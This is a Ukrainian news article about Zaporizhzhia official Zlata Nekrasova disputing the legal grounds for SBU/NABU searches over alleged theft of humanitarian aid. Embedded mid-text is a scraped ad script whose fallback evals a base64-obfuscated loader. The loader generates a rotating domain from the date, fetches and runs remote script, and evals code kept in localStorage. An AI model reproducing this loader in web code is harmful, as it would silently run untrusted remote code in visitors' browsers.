Злата Некрасова ставить під сумнів правові підстави обшуків, яку у неї пройшли

Заступниця голови ЗОВА Злата Некрасова зазначає, що на даний час підозру у вчиненні корупціійного злоучину вона не отримувала.

Про це вона написала на своїй сторінці в Instagram, передає «Акцент».

«Контролюючі органи вчора закінчили свою роботу. У воєнний час, вважаю, це необхідно. Хочу нагадати, що навесні я ініціювала першу перевірку, під час якої з’явилися важливі факти, які я надаю нижче» — розпочала посадовиця.

В ухвалі вищого антикорупційного суду вказано, що гуманітарна допомога реалізовувалась в великих супермаркетах.

«У квітні вже будучи головою гуманітарного штабу я подала заяву в такі інстанції як СБУ прокуратура та ГУНП з результатам інвентаризації та проханням перевірити всю роботу гуманітарного штабу та факти реалізації гуманітарної допомоги в супермаркетах та ринках. Була проведена перевірка ГУНП всіх великих супермаркетах АТБ Сільпо Треш Апельмон всіх ринків на предмет продажу гуманітарної допомоги. Жодного факту не виявлено. Відносно супермаркетів було встановлено закупівлю імпортних товарів за рахунок власного капіталу по контрактах з країнами ЄС та розмитнено згідно з розрахунками митних платежів.» — зазначає Некрасова.

Заступниця голови ЗОВА ставить під питання наявність правових підстав для проведення обшуків. Вона вважає, що це наслідок кар’єрних амбіцій політичних діячів. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«Питання виявлення злочинів з приводу незаконного використання гуманітарної допомоги стоїть на постійному контролі у правоохоронних органів як місцевого рівня так і вищої ланки.
На даний час підозри нікому не вручені, виявлення та вилучення коштів у держ службовців не було. Є питання у наявності правових підстав для проведення обшуків, тому що поки я бачу лише одну підставу  — деякі політичні діячі такими заявами у правоохоронні органи роблять політичну кар’єру та суспільний резонанс задля зміни влади»
 — завершила вона.

«Працюємо далі»: Злата Некрасова прокоментувала обшуки НАБУ

Нагадаємо, у вівторок СБУ та НАБУ провели обшуки у міськраді, обласній військовій обладміністрації, складських приміщеннях та за адресами проживання причетних до злочину осіб. Йшлося про т.в.о. міського голови Запоріжжя Анатолія Куртєва, його заступника Анатолія Васюка, та заступицю голови ЗОВА Злату Некрасову.

Спецслужба пояснює, що слідчо-оперативні дії відбуваються за фактом ймовірного незаконного привласнення гуманітарної допомоги, наданої Запорізькій області від початку широкомасштабного вторгнення РФ.

Повідомляється, що під час обшуків у посадовців Запорізької міської ради було виявлено: незареєстровану вогнепальну зброю та набої до неї, велику кількість готівки, речовини, схожі на наркотичні засоби, які направлені на експертизу. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/zlata-nekrasova-stavit-pid-sumniv-pravovi-pidstavi-obshukiv-yaku-u-neyi-projshli/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top